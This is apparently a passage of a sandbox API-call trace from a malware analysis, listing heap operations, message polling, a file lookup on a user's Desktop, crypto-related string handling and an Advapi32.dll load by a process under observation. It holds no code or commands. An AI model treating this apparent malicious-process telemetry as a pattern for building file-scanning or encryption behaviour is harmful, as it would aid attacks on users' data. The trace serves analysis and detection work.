0x2e54b98 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0188.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0188.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0188.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0188.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0188.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53848 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0188.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0188.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0188.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0188.567] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0188.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0188.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0188.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0188.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0188.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0188.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0188.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0188.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0188.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0188.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0188.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0188.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0188.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0188.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.573] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mfyUopWTtUAprVK7.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab0b4c0, ftCreationTime.dwHighDateTime=0x1d5e4cf, ftLastAccessTime.dwLowDateTime=0x78d6c600, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x78d6c600, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x11777, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="mfyUopWTtUAprVK7.mp3", cAlternateFileName="MFYUOP~1.MP3")) returned 0xa87350 [0188.573] FindClose (in: hFindFile=0xa87350 | out: hFindFile=0xa87350) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0188.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.574] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0188.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0188.574] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0188.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0188.575] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0188.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0188.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0188.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.576] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0188.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.576] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.577] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 